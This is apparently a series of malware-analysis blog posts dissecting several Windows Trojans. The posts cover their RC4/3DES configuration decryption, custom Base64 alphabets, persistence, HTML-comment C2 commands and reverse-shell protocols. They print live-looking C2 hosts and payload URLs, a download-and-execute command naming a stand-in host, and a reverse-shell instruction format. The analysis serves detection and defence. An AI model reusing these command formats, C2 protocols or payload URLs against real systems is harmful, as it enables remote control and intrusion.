10001E1C       PUSH dmdskngr.100042F4          UNICODE "file run ok"
10001E25       PUSH dmdskngr.100042D4          UNICODE "file run failed"
10001EA6       PUSH dmdskngr.10004324          UNICODE "kernel32.dll"
10001EB1       MOV ESI, dmdskngr.10004318      ASCII "CraatePipe"
10001FC0       PUSH dmdskngr.10004390          UNICODE "cmd.exe"
10002019       PUSH dmdskngr.1000436C          UNICODE "cmd create failed"
10002165       PUSH dmdskngr.10004364          ASCII "exit"
100021BB       PUSH dmdskngr.10004340          UNICODE "pip creat failed"
10002226       PUSH dmdskngr.100043A0          UNICODE "are you there? "

• Today I will look at another version of the Trojan I analyzed yesterday.
• The file I will be looking at today has the following characteristics:

File Name:  winsrv.exe
File Size:  16384 bytes
MD5:        438983192903f3fecf77500a39459ee6
SHA1:       12f12f03151c58b28a7d7246c7006888af2419e4
PE Time:    0x4AFA5A9E [Wed Nov 11 06:33:02 2009 UTC]
Sections (4):
 Name      Entropy  MD5
 .text     6.46     7ff188f9b5aea61d1c76148357bd7e3e
 .rdata    5.01     051ecda73070d6be8f96ba79e6a788af
 .data     3.64     272a56ff1f5b0eb66946c5c5287271ce
 .rsrc     1.54     19c9e330b0e6565f982fb1234d8a0b74

• This file was submitted to VirusTotal in March 2011, and it had a 11.6% identification rate.  See report here. Now, it has a 58.1% identification rate.  See report here.
• Just like in the previous analysis, this file decrypts its configuration data using RC4 with the following key:

00000000   31 32 33 21 40 23 71 77  65 51 57 45 00            123!@#qweQWE

• The Trojan entrenches itself using the same service as before (DevFS).
• The beacon URL is also the same as the previous sample: http://www.cometoway.org/comp/sem/resources.htm
• Just like the previous sample, this Trojan parses the HTML file for the comment tag, and Base64 decodes the instruction found there.
• Unlike the previous sample, when the Trojan is instructed to download and execute a file, it does not expect the file to be Base64 encoded.
  • This version of the Trojan does not expect the transferred file to be obfuscated in any way.
• Unlike the previous sample, this Trojan provides reverse shell functionality.  So, this Trojan supports these three types of instructions:

S: or s:     Sleep instruction.
D: or d:     Download and execute instruction.
IP:port      Reverse shell instruction.

• So, when the Trojan does not receive an “s” or “d” in the first byte of the decoded data, it searches for “:” and expects to receive an IP address and a port number.
• When the Trojan receives an IP:port instruction, it does the following:
  • It connects to the specified IP address over the specified TCP port number.
  • It copies cmd.exe into C:\WINDOWS\TEMP\iniet.exe, and executes iniet.exe.
  • It calculates the MD5 hash value of the string: 12345 which produces hash value: 827CCB0EEA8A706C4C34A16891F84E7B
  • It uses the first 8 bytes of the ASCII version of the hash value as a RC4 key to encrypt the communication over this connection.
  • So, the Trojan uses the 128-bit RC4 key shown below:

00000000   38 32 37 43 43 42 30 45  45 41 38 41 37 30 36 43   827CCB0EEA8A706C

• Finally, the Trojan Base64 encodes the RC4 encrypted data using a slightly modified alphabet:

STANDARD BASE64 ALPHABET:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

TROJAN ALPHABET
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/

• So, what you may see on the wire is the following:

Base64 encoded data:

00000000  59 33 76 61 52 37 2d 56  30 56 6a 36 67 64 6e 69 Y3vaR7-V 0Vj6gdni
00000010  33 59 75 51 61 70 4d 6d  38 34 7a 69 4a 65 56 6e 3YuQapMm 84ziJeVn
00000020  71 36 4a 59 68 34 34 74  44 6e 45 73 56 45 69 5a q6JYh44t DnEsVEiZ
00000030  45 67 4f 61 51 77 70 6e  31 52 41 52 51 44 75 6a EgOaQwpn 1RARQDuj
00000040  6b 35 48 72 39 53 55 75  46 77 50 34 6f 49 76 76 k5Hr9SUu FwP4oIvv
00000050  32 6d 70 37 48 45 46 31  56 54 58 52 65 6d 57 42 2mp7HEF1 VTXRemWB
00000060  35 4d 6b 45 38 6d 78 63  78 52 6d 56 64 34 54 6d 5MkE8mxc xRmVd4Tm
00000070  64 57 34 52 77 64 66 57  76 65 4a 6f 4c 6d 75 59 dW4RwdfW veJoLmuY
00000080  66 38 33 78 66 44 70 43  2f 6a 55 3d             f83xfDpC /jU=
0000008C  00                                               .

Using the custom alphabet the data above DECODES TO:

00000000   63 7B DA 47 BF 95 D1 58  FA 81 D9 E2 DD 8B 90 6A   c{ÚG¿•ÑXúÙâÝ‹
00000010   93 26 F3 8C E2 25 E5 67  AB A2 58 87 8E 2D 0E 71   “&óŒâ%åg«¢X‡Ž- q
00000020   2C 54 48 99 12 03 9A 43  0A 67 D5 10 11 40 3B A3   ,TH™  šC gÕ  @;£
00000030   93 91 EB F5 25 2E 17 03  F8 A0 8B EF DA 6A 7B 1C   “‘ëõ%.  ø ‹ïÚj{
00000040   41 75 55 35 D1 7A 65 81  E4 C9 04 F2 6C 5C C5 19   AuU5ÑzeäÉ òl\Å
00000050   95 77 84 E6 75 6E 11 C1  D7 D6 BD E2 68 2E 6B 98   •w„æun Á×Ö½âh.k˜
00000060   7F CD F1 7C 3A 42 FE 35                            Íñ|:Bþ5

Using the 128-bit RC4 key the data above DECRYPTS TO:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

• Today I will take a look at a simple Trojan.  The file has the following characteristics:

File Name:  winsrv.exe
File Size:  9216 bytes
MD5:        a2534e9b7e4146368ea3245381830eb0
SHA1:       daf456cefefe7492f4d0b67c662d6a631ecdb019
PE Time:    0x4C293EED [Tue Jun 29 00:31:41 2010 UTC]
Sections (4):
 Name      Entropy  MD5
 .text     6.03     7187e149cf1100b3feb4422f1bcf46b0
 .rdata    5.06     8cc17c11b3310389c68b7ae9fccd0701
 .data     4.8      c92c29f936e1abe0738f48a8cb656e69
 .rsrc     1.54     64dbfa32c9d59e19bcd7fcbf913a270c

• This file had already been submitted to VirusTotal in March 2011.  At that time this Trojan had a 11.6% identification rate.  See report here.
• When I resubmitted the file for analysis again today, I got a 0% identification rate.  See report here. This is pretty funny.
• When this Trojan is executed it starts by entrenching itself in the registry as a service named DevFS (Device File System).  The service path and description are shown below:
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DevFS
  • Saves installation files used for updates and repairs and is required for the downloading of Setup updates and Watson error reports.
• The Trojan the starts service DevFS.  So, process winsrv.exe will have services.exe as its parent process.
• At this point the Trojan starts with decrypting its configuration data using RC4 (ox004011B0).
• The data in question is shown below (0x2F is the length of the configuration data in blue):

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00002260   00 00 0F 00 48 00 65 00  6C 00 6C 00 6F 00 20 00       H e l l o  
00002270   66 00 72 00 6F 00 6D 00  20 00 4D 00 46 00 43 00   f r o m   M F C
00002280   21 00 00 2F FE 2C 19 6B  32 40 C9 3E ED FC D1 99   !  /þ, k2@É>íüÑ™
00002290   FD B1 31 C9 6B B3 59 8C  C7 47 09 9D 56 BD 3F 18   ý±1Ék³YŒÇG V½?
000022A0   33 83 E4 71 9C C8 29 2A  70 87 15 10 50 45 23 8B   3ƒäqœÈ)*p‡  PE#‹
000022B0   B0 C0 E6 00 00 00 00 00  00 00 00 00 00 00 00 00   °Àæ            
000022C0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

• The RC4 key used to decrypt this data can be found  at file-offset 0×2020:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00002010   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00002020   31 32 33 21 40 23 71 77  65 51 57 45 00 00 00 00   123!@#qweQWE   
00002030   48 54 54 50 20 4D 6F 7A  69 6C 6C 61 2F 35 2E 30   HTTP Mozilla/5.0
00002040   28 63 6F 6D 70 61 74 69  62 6C 65 2B 4D 53 49 45   (compatible+MSIE

• So, the RC4 key is 0x31323321402371776551574500 (yes, the NULL is part of the key).
• The encrypted data decrypts to the following URL:

http://www.cometoway.org/comp/sem/resources.htm

• The Trojan sends the following GET request:

GET /comp/sem/resources.htm HTTP/1.1
User-Agent: HTTP Mozilla/5.0(compatible+MSIE)
Host: www.cometoway.org
Cache-Control: no-cache

• The Trojan parses (0x004016D0) the received data for the HTML comment tags:

<!-- [Base64 encoded data] -->

• So, the data contained within the comment tags must be Base64 (0×00401060) encoded using almost the whole standard alphabet.  There is a 1 character difference between the standard alphabet and the one this Trojan uses:

STANDARD BASE64 ALPHABET:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

TROJAN ALPHABET
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/

• The first letter of the decoded data must be: s or d (lower or upper case).
• These two letters represent the instructions that this Trojan understands.

s or S - Instructs the Trojan to sleep for a specified time in hours.
d or D - Instructs the Trojan to download and execute a file.

• At the time of this writing file resources.htm contains the following comment:

<!-- czo2 --> decodes to s:6
which instructs the Trojan to sleep for 6 hours

• The download command has the following format:

"d:http://www.more-evil.com/trojan2.jpg trojan2.exe "

• The file requested in the URL is expected to be Base64 encoded using the custom alphabet shown above.
• The encoded file is downloaded and temporarily stored in a file named NET#.exe.
• Once the file is decoded, it is saved under the filename specified in the instruction (in this example: trojan2.exe) and is executed.

Update on www.cometoway.org

• After poking around this website I found the following directory structure, which includes additional HTML files with instructions for this type of Trojan.

www.cometoway.org => 67.20.115.170
└───comp
 │
 ├───ason
 │       searc.htm             Modified: 12/22/2010
 │
 ├───green
 │       construct.htm         Modified: 6/10/2010
 │       resources.htm         Modified: 3/25/2011
 │
 ├───ihhe
 │       index.html            No encoded instruction
 │       woodview.gif          Normal GIF.
 │
 ├───lib
 │       searc.htm             Modified: 8/31/2010
 │
 ├───moto
 │       resources.htm         Modified: 3/25/2011
 │
 ├───saw
 │       construct.htm         Modified: 6/10/2010
 │       resources.htm         Modified: 4/26/2011
 │
 ├───sea
 │       searc.htm             Modified: 4/20/2011
 │
 ├───sem
 │       resources.htm         Modified: 3/26/2011
 │
 ├───sii
 │       searc.htm             Modified: 12/3/2010
 │       searc.html            Modified: 10/5/2010
 │
 ├───spar
 │       company.htm          Modified: 6/10/2010
 │
 └───water
         57.gif               Normal GIF
         index.html           No encoded instruction
         water.htm            Modified: 3/15/2011

• All the relevant HTML files contain sleep instructions at this time, and they all contain Base64 encoded instructions using the standard alphabet, except file /moto/resources.htm.
• This file appears to contain an instruction encoded with a custom Base64 alphabet, but judging by the length of the instruction, it is probably a sleep instruction.  Here it is:

<!-- Q)k(J<== -->

• Recently I analyzed two malicious samples that were embedded within PNG files.  You can read the analysis of sample 1 here, and sample 2 here.
  
• Today, I will analyze the Trojan responsible for downloading and executing these types of PNG files.
  
• Here are the file characteristics:
  

File Name:  AcroRD32.exe
File Size:  20314 bytes
MD5:        1efc0c20b0445bc081890f16f59e672b
SHA1:       0adc179005e7ab3ed689d8959b30b31d1c93364e
PE Time:    0x4A8C97A7 [Thu Aug 20 00:24:07 2009 UTC]
Sections (3):
Name      Entropy  MD5
.text     6.1      4df2c1872cc098b1a72f80a286ecd425
.rdata    5.32     965c9f94db972dea96f4983b84d4a56c
.data     2.68     6254ecff135f9556b7ba9952f26188df

• Let’s start our analysis by opening this file using PE Explorer:
  

• PE Explorer tells us, among other things, that we have an extra 3418 bytes at the end of this file starting at file-offset 0×4200.
  
• If we open our file with WinHex and go to offset 0×4200, we see that the data is obfuscated:
  

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

000041E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000041F0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00004200   1B 34 5E 2D F6 FC 06 46  0C 7F 5B 02 4A 16 E0 F1    4^-öü F [ J àñ
00004210   1D CF 8E CD 42 0D 00 00  00 80 30 10 C7 E0 17 59    ÏŽÍB    €0 Çà Y
00004220   BC CB FC 0F 66 48 A0 5D  BC CB FC 0F 66 48 A0 5D   ¼Ëü fH ]¼Ëü fH ]
00004230   BC CB FC 0F 66 48 A0 5D  BC CB FC 0F 66 48 A0 5D   ¼Ëü fH ]¼Ëü fH ]
00004240   C0 09 92 F4 57 79 BC 6B  FE 67 E4 0D 50 7E 99 CC   À 'ôWy¼kþgä P~™Ì
00004250   A9 EA 89 80 9C 59 25 3F  17 55 DA 7B 64 32 23 43   ©ê‰€œY%? UÚ{d2#C
00004260   44 C4 41 58 31 0C FD AC  28 A9 57 5B A6 F5 2A D6   DÄAX1 ý¬(©W[¦õ*Ö
00004270   F3 23 38 48 18 56 93 C4  87 BD 27 C6 73 18 1C E6   ó#8H V"ć½'Æs  æ
00004280   B1 A0 B8 2B DE 44 4C 0A  37 4B 00 F5 BA 15 37 FA   ± ¸+ÞDL 7K õº 7ú
00004290   6F 81 2A 45 82 39 D3 4B  CD BA A2 36 7C DC 8E 9F   o*E‚9ÓKͺ¢6|ÜŽŸ
000042A0   64 4A 11 F0 41 90 BC 7C  BC CB FC 0F 66 48 A0 5D   dJ ðA¼|¼Ëü fH ]
000042B0   BC CB FC 0F 66 48 A0 5D  C4 17 A5 6E 4B 65 89 B5   ¼Ëü fH ]Ä ¥nKe‰µ
000042C0   BC CB FC 0F 66 48 A0 5D  BC CB FC 0F 66 48 A0 5D   ¼Ëü fH ]¼Ëü fH ]
000042D0   BC CB FC 0F 66 48 A0 5D  9E 87 D8 10 62 59 A5 B6   ¼Ëü fH ]ž‡Ø bY¥¶
000042E0   08 76 B4 5D 14 7D A9 3F  95 E2 A4 3B 35 A8 5A F1    v´] }©?•â¤;5¨Zñ

• The Trojan opens a file handle to itself, and then reads the file 4 bytes at a time looking for this sequence of bytes: 0x1B345E2D (this matches the first four bytes of our obfuscated data).

0040106F  |> /56            /PUSH ESI                       ; /stream
00401070  |. |6A 04         |PUSH 4                         ; |n = 4
00401072  |. |8D45 08       |LEA EAX, DWORD PTR SS:[EBP+8]  ; |
00401075  |. |6A 01         |PUSH 1                         ; |size = 1
00401077  |. |50            |PUSH EAX                       ; |ptr
00401078  |. |E8 BB2C0000   |CALL <JMP.&MSVCRT.fread>       ; \fread
0040107D  |. |83C4 10       |ADD ESP, 10
00401080  |. |807D 08 1B    |CMP BYTE PTR SS:[EBP+8], 1B
00401084  |. |75 12         |JNZ SHORT AcroRD32.00401098
00401086  |. |807D 09 34    |CMP BYTE PTR SS:[EBP+9], 34
0040108A  |. |75 0C         |JNZ SHORT AcroRD32.00401098
0040108C  |. |807D 0A 5E    |CMP BYTE PTR SS:[EBP+A], 5E
00401090  |. |75 06         |JNZ SHORT AcroRD32.00401098
00401092  |. |807D 0B 2D    |CMP BYTE PTR SS:[EBP+B], 2D
00401096  |. |74 08         |JE SHORT AcroRD32.004010A0
00401098  |> |F646 0C 10    |TEST BYTE PTR DS:[ESI+C], 10
0040109C  |. |75 73         |JNZ SHORT AcroRD32.00401111
0040109E  |.^\EB CF         \JMP SHORT AcroRD32.0040106F

• The Trojan then reads the next 16 bytes into a buffer (0xF6FC06460C7F5B024A16E0F11DCF8ECD)
• The next DWORD (0x420D0000) specifies the length of the data that follows (minus the last two bytes).
• This 0xD42 bytes of data is then decrypted using a form of 3DES-ECB encryption using the 16-byte key. The DES algorithm does not appear to be the standard one (I tried CrypTool with no success). However, the algorithm must be using the ECB mode because the data contains repeating 8-byte patterns.
• The decrypted data appears to contain configuration information and is partially shown below:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   66 72 65 65 00 00 00 00  00 00 00 00 00 00 00 00   free           
00000010   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000020   00 00 00 00 00 00 00 00  3A 00 00 00 20 00 00 00           :      
00000030   5C 00 00 00 2F 00 00 00  3C 21 2D 2D 20 00 00 00   \   /   <!--   
00000040   20 2D 2D 3E 00 00 00 00  25 73 20 25 73 00 00 00    -->    %s %s  
00000050   54 45 4D 50 00 00 00 00  54 4D 50 00 00 00 00 00   TEMP    TMP    
00000060   53 4F 46 54 57 41 52 45  5C 4D 49 43 52 4F 53 4F   SOFTWARE\MICROSO
00000070   46 54 5C 57 49 4E 44 4F  57 53 5C 43 55 52 52 45   FT\WINDOWS\CURRE
00000080   4E 54 56 45 52 53 49 4F  4E 5C 52 55 4E 00 00 00   NTVERSION\RUN  
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000A0   41 63 72 6F 72 65 61 64  00 00 00 00 00 00 00 00   Acroread       
000000B0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000C0   02 00 00 80 65 78 70 6C  6F 72 65 72 2E 65 78 65      €explorer.exe
000000D0   00 00 00 00 41 63 72 6F  52 44 33 32 2E 65 78 65       AcroRD32.exe
000000E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
                      *
                      *
                      *
000004C0   12 00 00 00 02 00 00 00  02 00 00 00 65 78 69 74               exit
000004D0   00 00 00 00 63 64 20 00  3E 00 00 00 68 74 74 70       cd  >   http
000004E0   3A 2F 2F 00 2A 2F 2A 00  00 00 00 00 57 69 6E 64   :// */*     Wind
000004F0   6F 77 73 2B 4E 54 2B 35  2E 31 00 00 77 77 77 2E   ows+NT+5.1  www.
00000500   6D 75 63 6B 6C 65 73 68  6F 6F 74 2E 6E 73 6E 2E   muckleshoot.nsn.
00000510   75 73 00 00 00 00 00 00  00 00 00 00 00 00 00 00   us             
00000520   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000530   00 00 00 00 00 00 00 00  00 00 00 00 2F 69 6E 64               /ind
00000540   65 78 2E 68 74 6D 00 00  00 00 00 00 00 00 00 00   ex.htm         
00000550   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000560   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000570   00 00 00 00 00 00 00 00  00 00 00 00 44 65 66 57               DefW
00000580   61 74 63 68 2E 65 78 65  00 00 00 00 00 00 00 00   atch.exe       
00000590   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
                          *
                          *
                          *
00000BE0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 63 64                 cd
00000BF0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 74 69                 ti
00000C00   6D 65 00 00 00 00 73 72  61 6E 64 00 00 00 72 61   me    srand   ra
00000C10   6E 64 00 00 00 00 5F 66  74 69 6D 65 00 00 61 74   nd    _ftime  at
00000C20   6F 66 00 00 00 00 61 74  6F 6C 00 00 00 00 61 74   of    atol    at
00000C30   6F 69 00 00 00 00 5F 69  74 6F 61 00 00 00 6C 73   oi    _itoa   ls
00000C40   74 72 6C 65 6E 41 00 00  00 00 00 00 00 00 6C 73   trlenA        ls
00000C50   74 72 63 70 79 41 00 00  00 00 00 00 00 00 6C 73   trcpyA        ls
00000C60   74 72 63 61 74 41 00 00  00 00 00 00 00 00 6C 73   trcatA        ls
00000C70   74 72 63 70 79 6E 41 00  00 00 00 00 00 00 6C 73   trcpynA       ls
00000C80   74 72 63 6D 70 69 41 00  00 00 00 00 00 00 73 74   trcmpiA       st
00000C90   72 73 74 72 00 00 00 00  00 00 00 00 00 00 73 73   rstr          ss
00000CA0   63 61 6E 66 00 00 00 00  00 00 00 00 00 00 73 70   canf          sp
00000CB0   72 69 6E 74 66 00 00 00  00 00 00 00 00 00 5F 73   rintf         _s
00000CC0   74 72 6E 69 63 6D 70 00  00 00 00 00 00 00 73 74   trnicmp       st
00000CD0   72 6E 63 61 74 00 00 00  00 00 00 00 00 00 21 40   rncat         !@
00000CE0   23 64 6D 63 23 40 21 00  00 00 00 00 00 00 21 40   #dmc#@!       !@
00000CF0   23 74 69 75 71 23 40 21  00 00 00 00 00 00 21 40   #tiuq#@!      !@
00000D00   23 74 72 6F 70 70 75 73  6E 75 23 40 21 00 63 6D   #troppusnu#@! cm
00000D10   64 2E 65 78 65 20 2F 63  20 00 00 00 00 00 00 00   d.exe /c       
00000D20   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000D30   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000D40   4E 57                                              NW

• The Trojan then creates a mutex named “free”, and sets the HIDDEN file attribute on the file.
• If not running from this location the Trojan copies itself to:

C:\Documents and Settings\username\Local Settings\Temp\AcroRD32.exe

• It then deletes itself (if not running from the path above) and executes the file from the path above.
• The Trojan entrenches itself under:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • Acroread = C:\Documents and Settings\username\Local Settings\Temp\AcroRD32.exe
• The Trojan then sends this type of GET request:

GET /index.htm HTTP/1.1
User-Agent: Windows+NT+5.1
Host: www.muckleshoot.nsn.us
Cache-Control: no-cache

• The content of index.htm is parsed for the HTML comment tag:

<!--...-->

• The data contained in this HTML comment tag is Base64 decoded using the standard alphabet (sub. 0x0040311C)
• The first two bytes of the decoded data are expected to be: ug

004030ED      |.  803F 75            CMP BYTE PTR DS:[EDI], 75
004030F0      |.  75 21              JNZ SHORT AcroRD32.00403113
004030F2      |.  80BE 39030000 67   CMP BYTE PTR DS:[ESI+339], 67
004030F9      |.  75 18              JNZ SHORT AcroRD32.00403113

• The data following the two bytes: ug instruct the Trojan what to do next. The valid options are shown below:

D or d:  Download an executable file embedded in a PNG file.
         Example: ugdbad.png
E or e:  Download and execute an executable file embedded in a PNG file.
         Example: ugebad.png
L or l:  Download and load a DLL file embedded in a PNG file.
         Example: uglbadDLL.png
Q or q:  Quit this session
R or r:  Reverse shell access to a specified IP/port
         Example: ugr11.22.33.44 666
S or s:  Set sleep time.

• When this Trojan is instructed to provide shell access to an IP address, it starts the communication by sending the 16 byte 3DES key followed by a NULL DWORD:

00000000  f6 fc 06 46 0c 7f 5b 02  4a 16 e0 f1 1d cf 8e cd ...F..[. J.......
00000010  00 00 00 00                                      ....

• The remote IP is expected to send the command: !@#dmc#@!
• As you can see, the command is cmd in reverse.
• The Trojan uses a different type of encryption for this communication. The encryption algorithm is shown below:

004037C6    .  56             PUSH ESI                    
004037C7    .  8B7424 08      MOV ESI, DWORD PTR SS:[ESP+8]
004037CB    .  57             PUSH EDI
004037CC    .  6A 01          PUSH 1
004037CE    .  8A06           MOV AL, BYTE PTR DS:[ESI]
004037D0    .  5F             POP EDI
004037D1    .  8AC8           MOV CL, AL
004037D3    .  C0E1 03        SHL CL, 3
004037D6    .  C0E8 05        SHR AL, 5
004037D9    .  0AC8           OR CL, AL
004037DB    .  324C24 10      XOR CL, BYTE PTR SS:[ESP+10]    ; XOR with 0xFC
004037DF    .  397C24 14      CMP DWORD PTR SS:[ESP+14], EDI
004037E3    .  880E           MOV BYTE PTR DS:[ESI], CL
004037E5    .  76 21          JBE SHORT AcroRD32.00403808
004037E7    >  8A1437         MOV DL, BYTE PTR DS:[EDI+ESI]
004037EA    .  8D0437         LEA EAX, DWORD PTR DS:[EDI+ESI]
004037ED    .  8ACA           MOV CL, DL
004037EF    .  C0E1 03        SHL CL, 3
004037F2    .  C0EA 05        SHR DL, 5
004037F5    .  0ACA           OR CL, DL
004037F7    .  8808           MOV BYTE PTR DS:[EAX], CL
004037F9    .  8A5437 FF      MOV DL, BYTE PTR DS:[EDI+ESI-1]
004037FD    .  32D1           XOR DL, CL
004037FF    .  47             INC EDI
00403800    .  3B7C24 14      CMP EDI, DWORD PTR SS:[ESP+14]
00403804    .  8810           MOV BYTE PTR DS:[EAX], DL
00403806    .^ 72 DF          JB SHORT AcroRD32.004037E7
00403808    >  5F             POP EDI
00403809    .  5E             POP ESI
0040380A    .  C2 0C00        RETN 0

• This algorithm can be expressed in the following way (the first byte of plain text data is XOR-ed with 0xFC.):
• For each byte of plain text (p), the encrypted (e) byte equals:
  • a = p << 3
  • b = p >> 5
  • c = a | b
  • e = c ^ previous encrypted byte

• When a PNG file containing an executable file is downloaded, the Trojan looks for the zTXt chunk of the PNG file.
  
• Typically this chunk contains compressed textual data, however if this data is not valid, it is silently ignored by the graphic applications.
• The embedded executable is obfuscated within the PNG file by being XOR-ed with 0xFF (inverted bits).
  

• Today I will take a look at another type of Trojan that was found embedded within a PNG file.
• Please refer to the analysis of the first sample for some background information on the technique used to embed this executable within the PNG file.
• There are actually two samples that are still hosted (as of the day of this post) at these two URLs:

http://aimscomputersystems.com/hello.png

File Name: hello.png
File Size: 225962 bytes
MD5: 06c6d543258bd5235a84424d426ca3f3
SHA1: 30fddeb69b51cc714c91ab8db7f49bdda3ebdc2c

and

http://aimscomputersystems.com/demo.png

File Name: demo.png
File Size: 197217 bytes
MD5: 6e86d893d7115d312bff73556b4fe0df
SHA1: b63c8176068adbbab003887d573bfbd8ca3baf3d

• The two executable files that were carved out of these two PNG files have the following characteristics:

File Name:  demo.exe
File Size:  151552 bytes
MD5:        7712d05c8b499fc7a1f4a6a6b6dee825
SHA1:       57c50ca6fd6356218541dd27bee4dd0595ade842
PE Time:    0x4B85C931 [Thu Feb 25 00:49:53 2010 UTC]
PEID Sig:   Microsoft Visual C++ 8
AV:         0/41 (0%) [VirusTotal]
Sections (4):
 Name      Entropy  MD5
 .text     6.64     2262823997e50080fb875f41a6cfa0be
 .rdata    5.12     5b508d30bce73c03449aefedca19e780
 .data     3.76     f92d22b50b4cef6e623a47f2bc03b62c
 .rsrc     5.11     3a4fdc31bb49b29d6f19b94641d14ee8

• File demo.exe is a variant of Trojan.PingBed, whose behavior is identical to the analysis of Sample 1. So, this file will not be covered any further in this post.

• The second executable has the following characteristics:

File Name:  hello.exe
File Size:  187392 bytes
MD5:        692cb0fca66738055396e1e1c8f0d52c
SHA1:       d7cdfb5c8319dd540a403ccde420e8c920549953
PE Time:    0x4C289FAE [Mon Jun 28 13:12:14 2010 UTC]
PEID Sig:   Microsoft Visual C++ 8
AV:         11/43 (25.6%) [VirusTotal]
Sections (4):
 Name      Entropy  MD5
 .text     6.68     b6647b71561a4a43a3463351cc24eb52
 .rdata    5.48     64274308f04ba9a10bd31a523354b7de
 .data     3.24     648da42fc5f7efd2302a417cefd521c0
 .rsrc     7.83     588d099c11b1e2b2a3395f1cf1f68fee

ANALYSIS OF hello.exe

• This Trojan, which I will name Trojan.NTESSESS, communicates with IP address 69.39.133.114 over TCP port 443, and actually uses SSL.
• Therefore, everything that follows would be encrypted by the SSL session key.
• It sends the following GET request:

GET /6K8gL8.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Cache-Control: no-cache
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 69.39.133.114
Connection: Keep-Alive
Cookie: NTESSESS=s9st0hzccBi; CONNECTID=01081318220

• The string NTESSESS is hard coded in the binary file.
• The string s9st0hzccBi is also hard coded in the binary file.
• The number following the CONNECTID is an 11 digit decimal representation of the victim’s volume serial number, and it is probably meant to uniquely identify this victim to the C2 node.

COMMAND STRUCTURE

• The data received from the C2 node is expected to be Base64 encoded.  It will have the following structure:
  • Bytes 0 – 134 appear to be irrelevant as they are not checked.
  • Bytes 135 + 137 + 139 + 141 are expected to equal 0x7B.
  • Bytes 136 + 138 + 140 + 142 are expected to equal 0xFA.
  • Bytes 143 – 146 can be NULL.
  • Byte 147 is where the command is expected to be.
  • The rest of the bytes vary depending on which command is used.
• Here is the code that performs the math on bytes 135 – 142 (EAX points to byte 135 at this point):

004020F0  /$  8B4424 04     MOV EAX, DWORD PTR SS:[ESP+4]
004020F4  |.  8A48 06       MOV CL, BYTE PTR DS:[EAX+6]
004020F7  |.  0248 04       ADD CL, BYTE PTR DS:[EAX+4]
004020FA  |.  0248 02       ADD CL, BYTE PTR DS:[EAX+2]
004020FD  |.  0208          ADD CL, BYTE PTR DS:[EAX]
004020FF  |.  80F9 7B       CMP CL, 7B
00402102  |.  75 17         JNZ SHORT hello.0040211B
00402104  |.  8A50 07       MOV DL, BYTE PTR DS:[EAX+7]
00402107  |.  0250 05       ADD DL, BYTE PTR DS:[EAX+5]
0040210A  |.  0250 03       ADD DL, BYTE PTR DS:[EAX+3]
0040210D  |.  0250 01       ADD DL, BYTE PTR DS:[EAX+1]
00402110  |.  80FA FA       CMP DL, 0FA
00402113  |.  75 06         JNZ SHORT hello.0040211B
00402115  |.  B8 01000000   MOV EAX, 1
0040211A  |.  C3            RETN
0040211B  |>  33C0          XOR EAX, EAX
0040211D  \.  C3            RETN

• Byte 147 is checked in a switch statement that has an input value range of 0×64 – 0xAB as shown below:

004026CD  |.  83C4 10            ADD ESP, 10
004026D0  |>  8B43 0C            MOV EAX, DWORD PTR DS:[EBX+C]
004026D3  |.  8D48 9C            LEA ECX, DWORD PTR DS:[EAX-64]           ;  Switch (cases 64..AB)
004026D6  |.  83F9 5A            CMP ECX, 5A
004026D9  |.  0F87 06020000      JA hello.004028E5
004026DF  |.  0FB689 38294000    MOVZX ECX, BYTE PTR DS:[ECX+402938]
004026E6  |.  FF248D 00294000    JMP DWORD PTR DS:[ECX*4+402900]

• Here is a list of the commands that this Trojan supports:

0xA0  - Upload a file (from victim to C2 node)
0xA3  - Download a file (from C2 node to victim)
0XA6  - Download URL to file
0xAA  - Process List
0xAB  - Kill a process
0x64  - Reverse Shell
0x66  - Execute a file
0x67  - Write to a file
0x69  - Execute via the shell
0x6B  - Set sleep time (in hours)
0x6C  - Set sleep time (in seconds).

• The Trojan encrypts the results of the commands by XOR-ing the data with a 9 byte key that changes with each transmission.
• The following describes how you can derive this 9 byte XOR key:
  • Below is a sample reply from the Trojan to the C2 node (only the tail end of the HTTP header is shown):
    • The data shown below is a partial dump of the HTTP header + 24 byte header + partial dump of process list command results (starting with 0x35DDA18E…).
    • In order to derive the 9 byte key we will focus on the 24 byte header (0x230D2A1F … 0xF2020000)
    • The 9 byte key is derived by XOR-ing 0xF7 with 0xF2230d2A1F0E0F20BF to give us the key: 0x05D4FADDE8F9F8D748
